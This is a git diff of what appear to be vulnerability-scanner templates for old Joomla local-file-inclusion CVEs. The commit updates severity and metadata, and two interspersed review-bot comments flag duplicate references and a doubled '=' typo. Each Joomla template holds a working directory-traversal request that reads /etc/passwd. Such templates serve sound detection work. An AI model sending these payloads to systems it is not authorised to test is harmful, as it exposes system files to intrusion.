Joomla! Component SVMap 1.1.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12066 
@@ -15,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1308 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01334 + cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: la-souris-verte + product: com_svmap + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index c09f623b60..83ac573be6 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1312 info: name: Joomla! Component News Portal 1.5.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12077 @@ -16,19 +16,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1312 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.01155 + cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ijoomla + product: com_news_portal + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 83f73fd79c..f0ef6c2a34 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml 
@@ -3,7 +3,7 @@ id: CVE-2010-1313 info: name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12082 @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N + cvss-score: 4.3 cve-id: CVE-2010-1313 cwe-id: CWE-22 - cvss-score: 4.3 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0045 + cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: seber + product: com_sebercart + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 21837a3f67..cc92a0b209 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1314 info: name: Joomla! Component Highslide 1.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12086 
@@ -16,19 +16,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1314 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00477 + cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlanook + product: com_hsconfig + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index a2e20b8354..8c951f9e6f 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml 
@@ -3,32 +3,38 @@ id: CVE-2010-1315 info: name: Joomla! Component webERPcustomer - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11999 - https://nvd.nist.gov/vuln/detail/CVE-2010-1315 - - http://web.archive.org/web/20140801092842/http://secunia.com/advisories/39209/ - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57482 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1315 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.0087 + cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_weberpcustomer + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 000fe3e17e..eb4aa14aa1 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml 
@@ -3,32 +3,38 @@ id: CVE-2010-1340 info: name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/33797 - https://nvd.nist.gov/vuln/detail/CVE-2010-1340 - - http://web.archive.org/web/20210121195000/https://www.securityfocus.com/bid/38917/ - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57123 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1340 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.01155 + cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla-research + product: com_jresearch + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 5c4140a495..bb173a095e 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml 
@@ -3,7 +3,7 @@ id: CVE-2010-1345 info: name: Joomla! Component Cookex Agency CKForms - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15453 @@ -15,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1345 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2010,joomla + epss-score: 0.00477 + cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cookex + product: com_ckforms + tags: lfi,edb,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index d42b08ff69..7dd39e516c 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -3,12 +3,11 @@ id: CVE-2010-1352 info: name: Joomla! Component Juke Box 1.7 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12084 - https://nvd.nist.gov/vuln/detail/CVE-2010-1352 - - http://web.archive.org/web/20140724194110/http://secunia.com/advisories/39357/ - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt remediation: Upgrade to a supported version. classification: 
@@ -16,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1352 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00477 + cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jooforge + product: com_jukebox + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 02a2d7fb5f..f23ad6a672 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -3,31 +3,37 @@ id: CVE-2010-1353 info: name: Joomla! Component LoginBox - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12068 - https://nvd.nist.gov/vuln/detail/CVE-2010-1353 - - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/ - http://www.vupen.com/english/advisories/2010/0808 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57533 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1353 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01751 + cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wowjoomla + product: com_loginbox + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 
diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 4be87fbeb0..c488906b3b 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1354 info: name: Joomla! Component VJDEO 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12102 - https://nvd.nist.gov/vuln/detail/CVE-2010-1354 - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt - - http://web.archive.org/web/20140724190841/http://secunia.com/advisories/39296/ + - http://www.exploit-db.com/exploits/12102 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1354 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00477 + cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_vjdeo + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 849735c450..9e9e2bcccb 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml 
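Review bot: The added reference `- http://www.exploit-db.com/exploits/12102` duplicates the existing `- https://www.exploit-db.com/exploits/12102` entry in the same list, differing only in scheme, so the new line should be dropped rather than added. The same scheme-only duplicate is introduced in the CVE-2010-1491 hunk (`.../exploits/12318`) and the CVE-2010-1534 hunk (`.../exploits/12067`), and several neighbouring templates already carry the pre-existing http/https pair as context, so a single de-duplication pass over the `reference` lists would keep the metadata consistent across the 2010 Joomla set.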
@@ -10,15 +10,21 @@ info: - https://rhn.redhat.com/errata/RHSA-2010-0377.html - https://nvd.nist.gov/vuln/detail/CVE-2010-1429 - https://nvd.nist.gov/vuln/detail/CVE-2008-3273 + - http://marc.info/?l=bugtraq&m=132698550418872&w=2 + - http://securitytracker.com/id?1023918 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-1429 - cwe-id: CWE-200 + cwe-id: CWE-264 + epss-score: 0.00573 + cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"JBoss" verified: true + vendor: redhat + product: jboss_enterprise_application_platform tags: cve,cve2010,jboss,eap,tomcat,exposure http: diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 1171b5d2f4..6e58f61607 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1461 info: name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12232 
@@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2010-1461 cwe-id: CWE-22 - cvss-score: 5.0 - tags: cve,cve2010,joomla,lfi,photo,edb + epss-score: 0.00477 + cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gogoritas + product: com_photobattle + tags: cve,cve2010,joomla,lfi,photo,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index fd6e840b1c..b35273a45e 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1469 info: name: Joomla! Component JProject Manager 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12146 
@@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2010-1469 cwe-id: CWE-22 - cvss-score: 6.8 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00813 + cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_jprojectmanager + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index cc35f7aaa2..2d405862c0 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/12166 - https://nvd.nist.gov/vuln/detail/CVE-2010-1470 - - http://web.archive.org/web/20140723205548/http://secunia.com/advisories/39405/ - http://www.exploit-db.com/exploits/12166 + - http://www.vupen.com/english/advisories/2010/0858 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1470 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.04616 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dev.pucit.edu.pk + product: com_webtv + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 3ab8409d01..45fd20e8d8 100644 --- a/http/cves/2010/CVE-2010-1471.yaml 
+++ b/http/cves/2010/CVE-2010-1471.yaml @@ -14,19 +14,25 @@ info: cvss-score: 7.5 cve-id: CVE-2010-1471 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.05684 + cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: b-elektro + product: com_addressbook + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index e62fb912f4..2c601b7227 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/12167 - https://nvd.nist.gov/vuln/detail/CVE-2010-1472 - - http://web.archive.org/web/20140723200143/http://secunia.com/advisories/39406/ - http://www.exploit-db.com/exploits/12167 + - http://www.vupen.com/english/advisories/2010/0859 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1472 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.05684 + cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kazulah + product: com_horoscope + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 90454e808a..83d5c8eb2c 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml 
@@ -3,7 +3,7 @@ id: CVE-2010-1473 info: name: Joomla! Component Advertising 0.25 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12171 @@ -16,19 +16,25 @@ info: cvss-score: 6.8 cve-id: CVE-2010-1473 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.00826 + cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: johnmccollum + product: com_advertising + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 307e7b0ef9..c16f307708 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml 
@@ -3,31 +3,37 @@ id: CVE-2010-1474 info: name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12182 - https://nvd.nist.gov/vuln/detail/CVE-2010-1474 - - http://web.archive.org/web/20140723205926/http://secunia.com/advisories/39388/ - http://www.exploit-db.com/exploits/12182 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57662 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1474 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: supachai_teasakul + product: com_sweetykeeper + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index f06a03b036..9e25e172a1 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml 
@@ -3,31 +3,37 @@ id: CVE-2010-1475 info: name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12147 - https://nvd.nist.gov/vuln/detail/CVE-2010-1475 - - http://web.archive.org/web/20140723203010/http://secunia.com/advisories/39285/ - http://www.exploit-db.com/exploits/12147 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57652 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1475 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.01242 + cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_preventive + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 802571dbea..8dc0b6ec8b 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml 
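Review bot: The request path on the new side still has a doubled `=` in `controller==../../`, which this commit leaves untouched while it rewrites the rest of the template; the value sent for `controller` would start with a literal `=`, so the traversal segment no longer begins the path and the template is likely to miss a vulnerable instance. Every sibling template in this series uses the single `controller=` form, so this reads as a typo rather than an intentional variant; the fix is `- "{{BaseURL}}/index.php?option=com_preventive&controller=../../../../../../../../../../etc/passwd%00"`. Worth re-validating against the referenced PoC before merging, since the added `matchers-condition: and` with the status matcher makes a false negative here silent.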
@@ -3,7 +3,7 @@ id: CVE-2010-1476 info: name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12150 @@ -16,19 +16,25 @@ info: cvss-score: 6.8 cve-id: CVE-2010-1476 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.03527 + cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: alphaplug + product: com_alphauserpoints + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 204f19f2f8..c8fcbbfd39 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1478 info: name: Joomla! Component Jfeedback 1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12145 
@@ -16,19 +16,25 @@ info: cvss-score: 6.8 cve-id: CVE-2010-1478 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00826 + cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ternaria + product: com_jfeedback + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 90474560f1..e36dccc99c 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml 
@@ -3,32 +3,38 @@ id: CVE-2010-1491 info: name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12318 - https://nvd.nist.gov/vuln/detail/CVE-2010-1491 - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt - - http://web.archive.org/web/20140724060325/http://secunia.com/advisories/39533/ + - http://www.exploit-db.com/exploits/12318 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1491 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.00477 + cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mms.pipp + product: com_mmsblog + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml 